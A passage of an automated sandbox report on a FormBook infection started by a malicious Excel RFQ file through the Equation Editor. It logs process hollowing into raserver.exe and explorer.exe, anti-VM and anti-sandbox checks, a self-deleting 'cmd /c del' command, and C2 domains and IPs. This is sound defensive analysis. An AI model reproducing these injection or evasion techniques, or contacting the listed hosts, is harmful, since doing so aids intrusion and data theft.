        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0048 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF938 NtWriteFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE1930 NtSetContextThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDF8CC NtWaitForSingleObject,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFBE8 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFA50 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFA20 NtQueryInformationFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE1D80 NtSuspendThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFD5C NtEnumerateKey,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC90 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC48 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EE0C40 NtGetContextThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFC30 NtOpenProcess,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFFFC NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFF34 NtQueueApcThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFEA0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EDFE24 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000981B0 NtCreateFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00098260 NtReadFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000982E0 NtClose,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00098390 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000981B4 NtCreateFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009825B NtReadFile,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000982DA NtClose,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0226632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_02266332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_022667C2 NtQueryInformationProcess,
        Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E90000 page execute and read and write
        Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: (RFQ) No.109050.xlsxReversingLabs: Detection: 34%
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$(RFQ) No.109050.xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE15.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/19@5/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
        Source: vbc[1].exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: vbc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: vbc.exe, 00000007.00000002.518168401.00000000002A0000.00000040.00020000.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: vbc[1].exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: vbc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.0.vbc.exe.330000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.vbc.exe.330000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\Public\vbc.exeCode function: 6_2_001D950F push edi; iretd
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004070F2 push CB9B4C56h; iretd
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004158FC pushfd ; retf
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3F2 push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3FB push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B3A5 push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B45C push eax; ret
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00415436 pushad ; retf
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00415CBF push ds; iretd
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A4DFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EEDFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000958FC pushfd ; retf
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_000870F2 push CB9B4C56h; iretd
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3A5 push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3FB push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B3F2 push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00095436 pushad ; retf
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0009B45C push eax; ret
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_00095CBF push ds; iretd
        Source: vbc[1].exe.4.drStatic PE information: 0x9EDDC985 [Wed Jun 17 18:52:53 2054 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15286878392
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15286878392
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2028, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2852Thread sleep time: -300000s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 3036Thread sleep time: -39025s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 2964Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\raserver.exe TID: 2012Thread sleep time: -32000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 39025
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: explorer.exe, 00000008.00000000.491890159.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: explorer.exe, 00000008.00000000.484440304.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000008.00000000.539206634.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
        Source: explorer.exe, 00000008.00000000.492529993.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: vbc.exe, 00000006.00000002.476810740.00000000024EC000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\Public\vbc.exeCode function: 7_2_004088A0 rdtsc
        Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00A526F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_01EF26F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
        Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B10 LdrLoadDll,
        Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeDomain query: www.corpmat.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
        Source: C:\Windows\explorer.exeNetwork Connect: 144.217.61.66 80
        Source: C:\Windows\explorer.exeDomain query: www.boxtobookshelf.com
        Source: C:\Windows\explorer.exeDomain query: www.hansel-design.com
        Source: C:\Windows\explorer.exeDomain query: www.aubergetoitrouge.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exeNetwork Connect: 75.2.89.208 80
        Source: C:\Windows\explorer.exeDomain query: www.afishin.com
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 7C0000
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
        Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
        Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: !Progman
        Source: explorer.exe, 00000008.00000000.497031162.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000009.00000002.685863634.00000000007E0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000009.00000002.685585617.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685471628.0000000000130000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.504321689.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.495180648.0000000009508000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.685396597.0000000000080000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.516398821.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.517732851.0000000000270000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.477732611.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
